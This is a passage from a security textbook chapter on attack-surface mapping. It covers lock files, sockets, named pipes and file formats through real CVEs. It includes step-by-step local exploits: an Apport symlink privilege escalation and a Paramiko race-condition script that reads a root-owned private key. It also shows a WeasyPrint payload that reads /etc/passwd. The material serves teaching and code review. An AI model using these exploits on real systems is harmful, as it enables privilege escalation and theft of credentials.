                While opening file "test"
                      CANNOT BE FOUND
                (1) Another program may be editing the same file. If this is the case,
                    be careful not to end up with two different instances of the same
                    file when making changes. Quit, or continue with caution.
                (2) An edit session for this file crashed.
                    If this is the case, use ":recover" or "vim -r test"
                    to recover the changes (see ":help recovery").
                    If you did this already, delete the swap file ".test.swp"
                    to avoid this message.

                     This error message calls it a swap file instead of a lock file because swap
                files serve a slightly different purpose of saving temporary data (in this case,
                your draft edits). However, Vim also uses this swap file as a lock file to warn
                users against starting another editing session.

                Exploiting a Hardcoded Path in Apport
                When developers fail to implement proper validation of important filepaths
                like lock files, attackers can exploit this weaknesses to control file reading
                and writing.
                     One implementation of lock files led to an interesting privilege esca-
                lation vulnerability (CVE-2020-8831) in Ubuntu via the Apport program.
                Apport is Ubuntu’s crash handler to detect and log crashes in user space
                processes. The code causing this vulnerability lay in the check_lock function
                (https://github.com/canonical/apport/blob/44a97a8/data/apport), as shown in
                Listing 2-10.

def check_lock():
    '''Abort if another instance of apport is already running.
    This avoids bringing down the system to its knees if there is a series of
    crashes.'''

    # create lock file directory
    try:
         os.mkdir("/var/lock/apport", mode=0o744) ¶
    except FileExistsError:
         pass

    # create a lock file
    try:
         fd = os.open("/var/lock/apport/lock", os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW) ·
    except OSError as e:
        error_log('cannot create lock file (uid %i): %s' % (os.getuid(), str(e)))
        sys.exit(1)

     def error_running(*args):
         error_log('another apport instance is already running, aborting')
         sys.exit(1)

     original_handler = signal.signal(signal.SIGALRM, error_running)
     signal.alarm(30) # timeout after that many seconds
     try:
          fcntl.lockf(fd, fcntl.LOCK_EX) ¸
     except IOError:
          error_running()
     finally:
          signal.alarm(0)
          signal.signal(signal.SIGALRM, original_handler)

Listing 2-10: The Apport check_lock function

                       Apport executes check_lock as part of its main routine, which creates
                  the lock file if it doesn’t exist ¶ and tries to acquire a lock on it using the
                  fcntl.lockf function ¸. This is a POSIX-compliant API call that places a lock
                  on a range of bytes within a file. The operating system maintains a list of all
                  locks to prevent processes from creating a lock if it already exists. Using
                  such OS APIs allows developers to implement lock files in a more stan-
                  dardized way.
                       When relying on hardcoded paths like /var/lock/apport/lock, programs
                  run the risk of attackers hijacking the files existing at those paths ahead
                  of time. This can be exploited with a symbolic link, or symlink, attack. A
                  symlink is a file that points to another file or directory. This occurs transpar-
                  ently to other programs, since the operating system automatically resolves
                  symlinks at the filesystem level.
                       If a symlink a points to a file b, running cat a outputs the contents of
                  b without any further processing required by the cat program. While con-
                  venient, this transparency also poses a threat to programs relying on hard-
                  coded paths because an attacker could use a symlink to redirect the program
                  to read from or write to a different destination that the program has access
                  to. This is a classic case of the “confused deputy problem,” in which an at-
                  tack tricks a higher-privileged program into performing actions that the
                  attacker hasn’t been granted permission to perform. Many local privilege
                  escalation exploits rely on some variation of the confused deputy problem.
                       Fortunately, operating systems provide ways for developers to check
                  whether a file is a symlink. In particular, the Linux open system call accepts
                  various file creation flag options, including O_NOFOLLOW, which according to
                  the manual page for open causes the following behavior: “If the trailing com-
                  ponent (i.e., basename) of pathname is a symbolic link, then the open fails,
                  with the error ELOOP.”
                       The Apport code appears to enable this flag ·, so why was it still vul-
                  nerable? The description of O_NOFOLLOW continues, “Symbolic links in earlier
                  components of the pathname will still be followed.”

             This is the problem: if any other component in /var/lock/apport/lock
       other than lock is a symlink, Apport will still happily follow it. In the case of
       Ubuntu, /var/lock is a symlink to /run/lock, which is readable and writable by
       all users. As such, an attacker can create a symlink at /var/lock/apport point-
       ing to any other directory, and if Apport runs afterward, it will create a lock
       file in the attacker-controlled destination. Since the os.open call doesn’t spec-
       ify a mode argument, it creates lock with the 0o777 file permission mode value
       by default, meaning the file is also readable and writable by all users.
             In short, an attacker can exploit this vulnerability to trick Apport into
       creating a globally writable file in a location that an attacker doesn’t have
       access to. There are many locations in Ubuntu where this can lead to a local
       privilege escalation, such as cron or startup script directories.
             Try this out in Ubuntu by downgrading to a vulnerable version of Ap-
       port. First, check the security update page for CVE-2020-8831 at https://
       ubuntu.com/security/CVE-2020-8831. The “Status” section lists the patched
       version for various Ubuntu releases. For the Xenial Xerus release (16.04.7
       LTS), the patch version for the Apport package is 2.20.1-0ubuntu2.23.
             Check the Apport package page for your Ubuntu release, such as https://
       launchpad.net/ubuntu/xenial/+source/apport for Xenial, and find the version
       right before the patch. In this case it’s 2.20.1-0ubuntu2.22, so for Xenial you
       would go to https://launchpad.net/ubuntu/+source/apport/2.20.1-0ubuntu2.22.
       Under the “Builds” section, there should be a link to the built binaries for
       your architecture. Follow the link and find the “Built files” section, which
       should have the download link for the vulnerable package (apport_2.20.1
       -0ubuntu2.22_all.deb for the Xenial release). After downloading the .deb file,
       install it with sudo dpkg -i <filename>.deb.

NOTE   In later versions, Apport enforces a hardened default user file creation mode mask
       (umask) of 022 for the root user. Even though it creates the lock file with the default
       access mode value of 777, it’s masked out against 022, ending up with a final value
       of 755. While the file is globally readable and executable, it’s not writable!
            Next, as a low-privileged user, create a symlink from the the Apport
       lock directory to the system /etc directory with ln -s /etc /var/lock/apport.
       If you try to create a file in the directory with touch /etc/evil, it will fail with
       touch: cannot touch '/etc/evil': Permission denied for the low-privileged user
       since Ubuntu assigns write permissions to /etc for only the root user.
            Now, run the exploit by causing a crash that triggers Apport. In Bash,
       you can run sleep 10s & kill -11 $!, which backgrounds a sleep process,
       then kills it with a segmentation fault signal. This triggers the Apport crash
       handler. Use ls -l /etc/lock to check whether the lock file was created; you
       should see something like:

       -rwxrwxrwx 1 root root 0 Mar 19 01:41 /etc/lock

           Success! With the ability to create a world-writable file as root, a low-
       privileged attacker can wreak all kinds of havoc.

                  Exploiting a Race Condition in Paramiko
                  Since file IPC is not atomic by default and relies on disk I/O operations that
                  are slower than the in-memory operations used by other IPC methods, it’s
                  also more vulnerable to race conditions.
                       One example is CVE-2022-24302, a race condition in Paramiko, a Python
                  module that implements the Secure Shell version 2 (SSH2) protocol. Pro-
                  grams use Paramiko to create SSH clients and perform other related
                  functions. For example, you might generate and save an RSA private key
                  with Listing 2-11.

gen_save_key.py import paramiko

                  # Generate private RSA key
                  pkey = paramiko.rsakey.RSAKey.generate(1024)

                  # Write private key to file
                  pkey.write_private_key_file('/tmp/testkey.pem')

Listing 2-11: Generating and saving an RSA private key with Paramiko

                       However, Paramiko’s internal _write_private_key_file method is vulnera-
                  ble to race conditions. Listing 2-12 shows the function code.

          pkey.py def _write_private_key_file(self, filename, key, format, password=None):
                   ¶ with open(filename, "w") as f:
                          # Race condition occurs here
                       · os.chmod(filename, o600)
                          self._write_private_key(f, key, format, password=password)

Listing 2-12: Paramiko’s _write_private_key_file method

                       The function first creates the file using open with the default world-
                  readable permissions ¶ before applying a more restrictive permission mode
                  with os.chmod ·. In the short time between the two function calls, an attacker
                  could open the file, reading from it even after Paramiko changes the file per-
                  missions and writes the private key data. This is because file permissions are
                  checked only when a file is opened, so if the owner changes the permissions
                  while the file descriptor remains open, the change will not be recognized; it
                  will only take effect when a new file descriptor is opened.
                       To exploit this gap between open and chmod, you can use a Python script
                  that repeatedly tries to open the known output filepath and read from it, as
                  shown in Listing 2-13.

       exploit.py while True:
                      try:
                           f = open('/tmp/testkey.pem', 'r')
                           input('file descriptor opened! press ENTER to read file')
                           print(f.read())
                           break

    except:
        continue

Listing 2-13: Paramiko’s race condition exploit script

    Install the vulnerable version of Paramiko with the command sudo pip
install paramiko==2.10.0 (running it with elevated permissions is important
so that the root user will use this version). Then run gen_save_key.py as the
root user to generate the key at /tmp/testkey.pem. As a non-privileged user,
you shouldn’t be able to read from the generated key file:

$ sudo python gen_save_key.py
$ cat /tmp/testkey.pem
cat: /tmp/testkey.pem: Permission denied

   Next, start the exploit script as the non-privileged user. As the root user,
remove the generated key file, then run gen_save_key.py again:

$ sudo rm /tmp/testkey.pem
$ sudo python gen_save_key.py

    In the non-privileged user’s session, you should see a success message
that allows you to proceed to read from the private key file:

$ python exploit.py
file descriptor opened! press ENTER to read file
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

     Because this is a race condition exploit, it may not work every time as
the permissions might be changed before the exploit script successfully
opens the file. When this happens, just retry the exploit.
     For further practice, try reproducing the Nimbuspwn collection of vul-
nerabilities (including symlink and time-of-check/time-of-use race condition
issues) discovered by the Microsoft 365 Defender Research Team that led to
privilege escalation in several Linux distributions (https://www.microsoft.com/
en-us/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux
-vulnerability-nimbuspwn/).
     Like all other attack vectors, file IPC can lead to vulnerabilities if an at-
tacker hijacks the communication (in this case, by writing to a known filepath
the application uses) and injects malicious input. However, given the special
nature of files, including symbolic links and lack of atomicity, you should
also keep an eye out for exploits like CVE-2020-8831 and CVE-2022-24302.

Sockets
A socket is an endpoint that allows communication between processes. We
saw an example of the remote variant in the simple vulnerable TCP server

                 from Chapter 1. Sockets are one of the more common IPC channels and
                 hence present a rich source of potential attack vectors.
                      Unix operating systems also support Unix domain sockets (UDSs), a local
                 variant that operates in stream, datagram, and sequenced packet modes,
                 similar to TCP, UDP, and SCTP, respectively. However, UDSs don’t incur
                 the overhead of a network protocol layer and thus run faster. In keeping
                 with the “everything is a file” philosophy of Unix, you can represent sockets
                 as files in the operating system, as compared to network sockets that you ad-
                 dress using an IP address and port number. However, binding a UDS to a
                 filesystem pathname exposes it to the many namespace hijacking issues of
                 file IPC. Additionally, by delegating access control to the filesystem, UDSs
                 open up the possibility of inappropriate file permissions.
                      CVE-2022-21950 was a vulnerability in Canna, a Japanese Kana–Kanji
                 server, that arose from the hardcoded directory /tmp/.iroha_unix containing
                 the UDS used by Canna. As described in the bug report (https://bugzilla.suse
                 .com/show_bug.cgi?id=1199280), the openSUSE operating system patched a
                 previous bug in Canna by changing the Canna systemd service configuration
                 to remove the directory before and after running:

                 ExecPre=/bin/rm -rf /tmp/.iroha_unix
                 ExecStart=/usr/sbin/cannaserver -s -u wnn -r /var/lib/canna
                 ExecStopPost=/bin/rm -rf /tmp/.iroha_unix

                      Unfortunately, this meant there was a window of opportunity for an-
                 other user to create the /tmp/.iroha_unix directory with world-writable per-
                 missions. Previously, this directory was configured in systemd to be created
                 by the root user at startup, leaving no chance for a low-privileged attacker
                 to override it. If Canna created a socket in the directory, an attacker could
                 replace it with their own controlled socket, effectively creating a man-in-the-
                 middle attack to intercept Japanese language user input in the operating
                 system.
                      UDSs provide one mechanism to prevent such attacks, as described in
                 the unix(7) Linux manual page: “UNIX domain sockets support passing file
                 descriptors or process credentials to other processes using ancillary data.”
                 This feature allows sockets to identify the sending process when receiving a
                 message by accepting additional data in the struct ucred format:

                 struct ucred {
                     pid_t pid;     /* Process ID of the sending process */
                     uid_t uid;     /* User ID of the sending process */
                     gid_t gid;     /* Group ID of the sending process */
                 };

                     For example, a privileged program listening to a socket can ensure all
                 messages it receives come from privileged user groups, providing an addi-
                 tional level of access control. Since this mechanism occurs in the kernel, it’s
                 impossible to spoof credentials in a typical scenario.

   Windows added support for UDSs in 2017 (https://devblogs.microsoft.com/
commandline/af_unix-comes-to-windows/). As more forms of IPC are added and
updated in operating systems, the potential attack surface of software grows.

Named Pipes
Named pipes are another means by which processes can communicate us-
ing a file-like paradigm. However, on Windows, named pipes have their own
access control model separate from the default filesystem, creating an addi-
tional layer of potential authorization issues.

Windows Named Pipe Filesystem
Unlike named pipes on Unix, which can be accessed by only one reader pro-
cess and one writer process at a time, Windows allows for named pipe commu-
nication between a server and multiple clients in a named pipe filesystem. Due
to the special namespace property of Windows named pipes, different pro-
cesses can create multiple server instances of a named pipe at the same time.
     Take a closer look at the CreateNamedPipe function, which creates an in-
stance of a named pipe:

HANDLE CreateNamedPipeA(
    [in]           LPCSTR                lpName,
    [in]           DWORD                 dwOpenMode,
    [in]           DWORD                 dwPipeMode,
    [in]           DWORD                 nMaxInstances,
    [in]           DWORD                 nOutBufferSize,
    [in]           DWORD                 nInBufferSize,
    [in]           DWORD                 nDefaultTimeOut,
    [in, optional] LPSECURITY_ATTRIBUTES lpSecurityAttributes
);

    This API call takes in a nMaxInstances argument, which allows the first
instance of the pipe to specify the maximum number of instances that can
be created for the pipe identified by lpName. As long as nMaxInstances ranges
from 1 to PIPE_UNLIMITED_INSTANCES (255), we can create multiple instances.
This is necessary for multithreaded named pipe servers or overlapping I/O
operations to serve simultaneous connections from multiple clients, but it
allows other processes to hijack the named pipe.
    Take, for example, a high-privileged program that creates a named pipe
server and client for IPC. If a low-privileged attacker creates the named pipe
server before the program does, it could potentially intercept messages from
the client. Worse, if the client makes use of the server’s responses to execute
actions such as running commands, it could lead to privilege escalation.
    The order of creation is important because clients connect to server in-
stances in first in, first out (FIFO) order. Additionally, the dwOpenMode argu-
ment must not include the FILE_FLAG_FIRST_PIPE_INSTANCE (0x00080000) flag,
which prevents creating additional instances of a pipe. This was the case for
CVE-2022-21893, a privilege escalation exploit in Windows Remote Desktop

                 Services (RDS) that allowed an attacker to intercept the messages of RDS
                 named pipe IPC.

                 Security Misconfigurations in Named Pipes
                 Because Windows named pipes rely on developers to properly set an access
                 control list (ACL) using the lpSecurityAttributes argument rather than del-
                 egating access control to the filesystem, misconfigured access can lead to
                 information leaks for privilege escalation.
                      The default lpSecurityAttributes value grants read access to members
                 of the Everyone group and the anonymous account. If an unaware devel-
                 oper sends sensitive data over a named pipe, a low-privileged attacker can
                 access it. Additionally, a misconfigured ACL could allow an attacker to cre-
                 ate a client connection to a privileged named pipe server and send arbitrary
                 messages. If the server’s message handler uses the input to execute privi-
                 leged actions, a security boundary is crossed. Take a look at the description
                 for CVE-2022-24286:
                         Acer QuickAccess 2.01.300x before 2.01.3030 and 3.00.30xx be-
                         fore 3.00.3038 contains a local privilege escalation vulnerability.
                         The user process communicates with a service of system authority
                         through a named pipe. In this case, the Named Pipe is also given
                         Read and Write rights to the general user. In addition, the ser-
                         vice program does not verify the user when communicating. A
                         thread may exist with a specific command. When the path of the
                         program to be executed is sent, there is a local privilege escala-
                         tion in which the service program executes the path with system
                         privileges.

                     While the source code of Acer QuickAccess isn’t publicly accessible, this
                 description suggests that an instance of a misconfigured ACL for a named
                 pipe led to privilege escalation. Listing 2-14 shows how we might create a
                 world-readable and -writable named pipe like this in C#.

 worldrwpipe.cs using System;
                using System.IO.Pipes;
                using System.Security.AccessControl;
                using System.Security.Principal;

                 public class Program
                 {
                     static void Main(string[] args)
                     {
                         // Create world-readable and writable ACL
                         SecurityIdentifier securityIdentifier = new SecurityIdentifier(
                             WellKnownSidType.WorldSid,
                             null
                         );
                         PipeAccessRule pipeAccessRule = new PipeAccessRule(
                             sid,

             PipeAccessRights.ReadWrite,
             AccessControlType.Allow
         );
         PipeSecurity pipeSecurity = new PipeSecurity();
         pipeSecurity.AddAccessRule(pipeAccessRule);

         // Create named pipe server with ACL
         NamedPipeServerStream pipeServer = NamedPipeServerStreamAcl.Create(
             "worldRWPipe",
             PipeDirection.InOut,
             NamedPipeServerStream.MaxAllowedServerInstances,
             PipeTransmissionMode.Byte,
             PipeOptions.Asynchronous,
             0,
             0,
             pipeSecurity
         );

         pipeServer.WaitForConnection();

         // Dangerous actions with untrusted input here...
     }
}

Listing 2-14: A world-readable and -writable named pipe

     In Unix systems, we create named pipes with the mkfifo API call, which
takes the pipe pathname as the first argument and the file permission mode
as the second. As with other file creation APIs, we modify the effective mode
by the umask with mode & ~umask. The filesystem then determines access to
the named pipe like any other file.

Other IPC Methods
The number of IPC methods is constantly growing as operating systems and
third-party software add features. The following is a nonexhaustive list:
    •    Shared memory
    •    System signal
    •    Message queue
    •    Memory-mapped file
    •    Remote procedure call
    •    Component Object Model (COM, Windows only)
    •    Dynamic Data Exchange (DDE, Windows only)
    •    Clipboard
    •    D-Bus (Linux only)
    •    MailSlot (Windows only)
                                                           Mapping Code to Attack Surface   55

                      Developers use these APIs in creative (and potentially insecure) ways.
                 For example, I analyzed an application that used the Windows SendMessage
                 function, which typically sends simple one-way messages between windows
                 on the desktop user interface, to pass complex serialized data structures. It
                 determined which window to send the message to using the FindWindow func-
                 tion, which accepts two arguments: lpClassName and lpWindowName. Because
                 the application set lpClassName to NULL, FindWindow returned the first window
                 whose title matched lpWindowName. This is even more insecure than using
                 named pipes because the window returned by FindWindow isn’t guaranteed
                 to be in FIFO order, allowing an attacker to MITM any messages sent using
                 this channel.
                      Stay alert for potentially unorthodox IPC implementations. Since the
                 various IPC mechanisms share a purpose of exchanging messages between
                 processes, they often display similar patterns in code, such as client/server
                 listeners, that allow you to identify them. As part of attack surface mapping,
                 try enumerating all IPC methods used by the target.

     File Formats
                 Almost all software needs to handle files. From newline-delimited configu-
                 ration files to video clips, we encode data in a variety of formats. Like pro-
                 tocols, file formats require software to parse data structures in a standard
                 manner. Unfortunately, developers sometimes make mistakes in implemen-
                 tation that can lead to vulnerabilities, and some file formats may fail to con-
                 sider security concerns by design, forcing developers to patch gaps in the
                 aftermath.
                      Many file formats are documented in RFCs, but proprietary or older
                 formats may require more digging. You’ll come to recognize common types
                 and components. For example, file formats are often roughly divided into
                 three parts:
                     Header Appears at the start of the file and usually begins with a set of
                     unique bytes so software can identify the file format. Contains metadata
                     such as feature flags, version, and other information needed to parse
                     the file properly.
                     Body Contains the main data associated with the format, often grouped
                     into chunks for software to parse easily.
                     Footer Contains additional metadata, such as checksums to ensure
                     data integrity.
                     There is a large variance among formats. For example, the XML for-
                 mat is markup-based, relying on sets of symbols that indicate how to pro-
                 cess different parts of the file. Markup-based formats are typical for text
                 documents, such as this book, which I wrote in LaTeX. For XML, the most
                 important symbols are the <> characters, which designate tags in an XML
                 document:

<?xml version="1.0"?>
<greeting>Hello, world!</greeting>

     There’s no evidence of a footer in this example XML document.
     Other formats diverge even further from the header-body-footer pat-
tern, such as directory-based formats, which organize data into multiple
files within a directory structure. For example, Microsoft Office documents
(such as .docx and .pptx files) are essentially ZIP files in disguise, containing
resource and metadata files such as XML documents, images, and so on.
You’re able to open a .docx file in a file archiver like 7-Zip because the raw
bytes of the file are arranged in the ZIP archive format. Software like Mi-
crosoft Word differentiates a DOCX from a ZIP file only via the filename
extension. However, you can’t create a random ZIP file, change the exten-
sion to .docx, and expect Microsoft Word to open it. The DOCX format adds
additional requirements on top of ZIP concerning the existence and organi-
zation of files in the archive as well as their contents.
     Given the diversity of file formats, I’ll highlight some common patterns
that typically warrant greater scrutiny.

Type–Length–Value
The type–length–value (TLV) pattern occurs in both protocols and file for-
mats. We use TLV for chunked data in the body because its structure allows
a parser to easily identify and consume chunks of variable length. It consists
of three parts:
    Type The kind of data field
    Length The size of the data field
    Value The data itself
    The popular Portable Network Graphics (PNG) format uses the TLV
pattern. The body of a PNG file consists of a series of chunks made up of
four parts: length (4 bytes), chunk type (4 bytes), chunk data (length bytes),
and cyclic redundancy check (CRC) checksum (4 bytes). For example,
Table 2-1 shows how the header chunk type, denoted by chunk type code
IHDR, is parsed.

Table 2-1: An Example PNG IHDR Chunk
                  Part     Hex bytes      Value
                  Length   00 00 00 0d    13
                  Type     49 48 44 52    IHDR
                  Data     00 00 00 01    Width: 1
                  Data     00 00 00 01    Height: 1
                  Data     08             Bit depth: 8
                  Data     00             Color type: 0
                  Data     00             Compression: 0
                  Data     00             Filter: 0
                  Data     00             Interlace: 0
                  CRC      3a 7e 9b 55    CRC-32: 3A7E9B55

                     When implementing TLV, developers may sometimes forget to check
                 for mismatches between the expected size of a chunk as denoted by its type
                 and the length value. For example, the IHDR chunk, as defined by the PNG
                 format, should contain 13 bytes’ worth of metadata. However, a careless de-
                 veloper could blindly trust the value given by the length part and attempt
                 to copy an attacker-controlled length bytes (which has a maximum value of
                 2,147,483,647) into a 13-byte IHDR struct buffer.
                     I observed one such vulnerability in Apache OpenOffice (CVE-2021-
                 33035), which accepted the dBase database file (DBF) format. The DBF
                 format includes a field descriptor array in the header where each field de-
                 scriptor defines the field type (1 byte) and size (1 byte). Unfortunately,
                 OpenOffice’s code trusted both these values, such that for a field type I
                 (corresponding to an integer), it allocated a buffer of 4 bytes—which would
                 be correct for an Int32 type—but copied the attacker-controlled size number
                 of bytes into that buffer:

                 // nType is taken from field descriptor type value
                 else if ( DataType::INTEGER == nType )
                 {
                     // sal_Int32 type is 4 bytes
                     sal_Int32 nValue = 0;
                     // nLen is taken from field descriptor size value
                     memcpy(&nValue, pData, nLen);
                     *(_rRow->get())[i] = nValue;
                 }

                      Since the size field in the field descriptor structure was 1 byte, it had a
                 maximum value of 255, leading to an overflow of 251 bytes that overwrote a
                 return pointer address on the stack. This was sufficient to build a full-blown
                 code execution exploit (https://spaceraccoon.dev/all-your-d-base-are-belong-to-us
                 -part-1-code-execution-in-apache-openoffice/).
                      Many file formats and network protocols apply the TLV pattern. Test for
                 vulnerabilities that arise from type and length discrepancies.

Directory-Based
A significant subset of file formats are directory-based, meaning the file is ac-
tually a wrapper around many other files. Typically, directory-based formats
require a manifest that contains additional metadata about the rest of the
files, including where they’re located. This pattern tends to expose two types
of vulnerabilities, related to file traversal and child format.
     File traversal occurs if the software insecurely parses the directory data.
Take the ZIP format, on which many directory-based formats are built, which
is generally structured like this:

[local file header 1]
[file data 1]
[data descriptor 1]
.
.
.
[local file header n]
[file data n]
[data descriptor n]
[archive decryption header]
[archive extra data record]
[central directory]
[zip64 end of central directory record]
[zip64 end of central directory locator]
[end of central directory record]

     Each file header (which appears in both local file headers and the cen-
tral directory structure) contains metadata about a file contained in the
archive. In particular, the header includes a filename field of variable size.
The filename can include a relative path; for example, nested/file is extracted
to ./nested/file in the output directory. However, there’s no explicit restric-
tion on filenames that include path traversal values, such as ../../../../tmp/file.
A parser that trusts such a value could extract files into dangerous locations,
such as cron job folders or application working directories. When reviewing
code related to directory-based formats, pay attention to how the software
handles data related to the locations of the files in the directory.
     Next, consider the types of files contained within the directory. For ex-
ample, many directory-based formats use an XML file as their manifest that
contains important information about how to parse the rest of the files. As
such, software that handles those files must parse the XML manifest first.
The XML format has a number of potential vulnerabilities if parsed inse-
curely, including XML External Entity (XXE) injection. In short, XML al-
lows the inclusion of external entities, including local and remote files. By
crafting an XML file to use these entities, an attacker can force a vulnerable
parser to disclose local file data to a remote address.
     This was the case with CVE-2022-0219, an XXE injection vulnerability
in JADX, a popular open source Android application decompiler. Android
applications typically appear in the Android Package (APK) format, which

                 must include an AndroidManifest.xml manifest file. By inserting an XXE pay-
                 load into AndroidManifest.xml, an attacker could cause JADX to disclose local
                 file data when exporting a decompiled Android application. To patch this,
                 JADX switched to a secure XML parser that didn’t process external entities.
                      Child format–related vulnerabilities occur because developers tend to
                 focus on the parent directory–based format and delegate handling child
                 file formats to external libraries, which may not parse securely by default.
                 Look for instances in which child files are processed, such as manifests, and
                 validate their usage.
                      Sometimes, both types of vulnerabilities occur in the same software.
                 I encountered this in a custom package format that was based on ZIP and
                 used an XML manifest. By chaining a ZIP path traversal and XXE, I was able
                 to enumerate the filesystem and upload a web shell to achieve full remote
                 code execution (https://spaceraccoon.dev/a-tale-of-two-formats-exploiting-insecure
                 -xml-and-zip-file-parsers-to-create-a/).

                 Custom Fields
                 File formats often include reserved bytes or extendable fields that allow de-
                 velopers to add custom functionality. Often, custom functionality is badly
                 documented and adds unknown features, meaning it can be particularly
                 dangerous.
                      For example, the iCalendar (ICS) format that is used by nearly all calen-
                 dar software, from Outlook to Apple Calendar, provides a “standard mech-
                 anism for doing non-standard things” via nonstandard properties denoted
                 by the X- prefix. This has led to all kinds of interesting behavior that went be-
                 yond the default ICS properties, such as event location, time, and name. Old
                 versions of Microsoft Office, for instance, supported the X-MS-OLK-COLLABORATEDOC
                 property that automatically opened a conferencing collaboration document
                 when an event started. Given that events can be created remotely via event
                 invitations, this could lead to dangerous outcomes, like forcing a user to
                 open a malicious file from a network share.
                      Sometimes, developers jerry-rig custom fields by parsing data differently
                 from how a standard defines it. For example, the HTML format defines the
                 <link> element, which specifies external resources related to the current
                 HTML document. The type of relationship is denoted by the rel attribute.
                 Thus, to indicate a stylesheet located at main.css, an HTML document could
                 include the following element:

                 <link href="main.css" rel="stylesheet">

                      The HTML standard defines a list of supported tokens for rel and speci-
                 fies the expected behavior. However, the WeasyPrint HTML-to-PDF conver-
                 sion engine extends the function of <link> by supporting a custom attachment
                 value for rel that doesn’t appear in the HTML standard. By using this value,
                 a developer can include local files as attachments to the output PDF:

                 <link href="file:///etc/passwd" rel="attachment">

             This is a feature, not a vulnerability in itself, but a developer that uses
        WeasyPrint without accounting for this behavior could introduce a vulnera-
        bility in their software.
             To identify these kinds of custom implementations, look for ways in
        which the code diverges from a file format’s specification beyond just im-
        plementation errors. While established standards often consider various
        security issues through an open vetting process, custom extensions may not
        undergo such scrutiny and can repeat common mistakes.

Conclusion
        We explored a range of potential attack vectors in this chapter, from net-
        work protocols to inter-process communication. You learned how to iden-
        tify the source code that defines and exposes these attack vectors, and you
        explored common patterns in file formats and vulnerabilities associated
        with them.
             Ultimately, the attack surface of any software can vary greatly based on
        the threat model and environment. A local attacker on Windows can exploit
        IPC mechanisms like window messages, while remote attackers can access
        only exposed network protocols and network-enabled IPC mechanisms, such
        as named pipes.
             Whether an attack vector is viable largely depends on whether a security
        boundary is crossed. While enumerating the attack surface of software from
        its code, use this distinction to correctly identify vulnerabilities. This will
        enable you to quickly focus in on exploitable scenarios.
             Applying the various techniques outlined in this chapter will better equip
        you to assess an application’s attack surface and build a realistic threat model
        before diving into the depths of code review. As you expand to larger-scale
        variant analysis in the next chapter, narrowing your search space to reach-
        able attack surfaces will prove critical to the accuracy of your results.

